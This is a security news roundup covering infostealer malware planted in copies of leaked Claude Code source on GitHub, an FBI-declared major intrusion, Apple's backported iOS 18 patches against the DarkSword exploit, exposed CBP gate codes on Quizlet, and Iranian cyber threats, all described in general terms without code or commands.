Claude Code Leak Spreads With Hidden Malware

A significant source code leak for the popular AI coding assistant, Claude Code, has triggered a dangerous wave of malware distribution. After Anthropic inadvertently made the tool’s code public, copies rapidly proliferated on platforms like GitHub. Security analysts warn that many of these repositories are now traps, with hackers embedding infostealer malware within the posted code. This tactic exploits developer curiosity, turning a leak into a widespread security threat. Anthropic has responded aggressively, issuing copyright takedown notices to remove thousands of the offending repositories.

This incident echoes a previous campaign from March, where malicious actors used sponsored Google ads to pose as official Claude Code installation guides. Those fake sites directed users to run commands that downloaded malware instead of the legitimate tool. The pattern highlights how threat actors consistently target tools with high user interest, especially those requiring command-line installation that can be easily manipulated.

In a separate but serious development, the FBI has formally declared a recent cyber intrusion into one of its systems a “major incident” under the Federal Information Security Management Act (FISMA). This legal designation is reserved for breaches posing serious risks to national security and is reportedly the first such declaration for the bureau’s own systems since at least 2020. According to reports, the intrusion is believed to be the work of Chinese state-sponsored actors. If confirmed, the breach would represent a notable counterintelligence failure.

The FBI detected suspicious activity on its networks in February. The compromised systems, while unclassified, contained sensitive “returns from legal process.” This includes data such as phone and internet metadata collected under court orders, along with personal information on subjects of FBI investigations. The attackers reportedly gained access via a commercial internet service provider, a method the bureau described as employing “sophisticated tactics.” In a public statement, the FBI said it has deployed all available technical capabilities in response.

On another front, Apple took the unusual step this week of releasing “backported” security patches for the older iOS 18. This move aims to protect millions of users who have not upgraded to the current operating system from an active exploit called DarkSword. Discovered in March, this hacking technique can infect iPhones simply by visiting a compromised website. Apple initially urged users to update to iOS 26 but issued the patches for the older system as the threat continued to spread.

Further security concerns emerged from a WIRED investigation, which found that sensitive Customs and Border Protection (CBP) facility information, including gate codes, was publicly accessible on the learning platform Quizlet through basic Google searches. The report also identified Border Patrol agents involved in use-of-force incidents during an operation in Chicago last fall, noting several had participated in similar operations in other states.

Geopolitical tensions also escalated digital threats. The ongoing US-Israel conflict with Iran entered its second month, with Iran threatening cyber attacks against more than a dozen US companies, including major tech firms with operations in the Gulf region. The broader conflict continues to disrupt global trade, particularly through the strategic Strait of Hormuz, raising complex questions about the potential consequences of any strike on Iran’s nuclear facilities.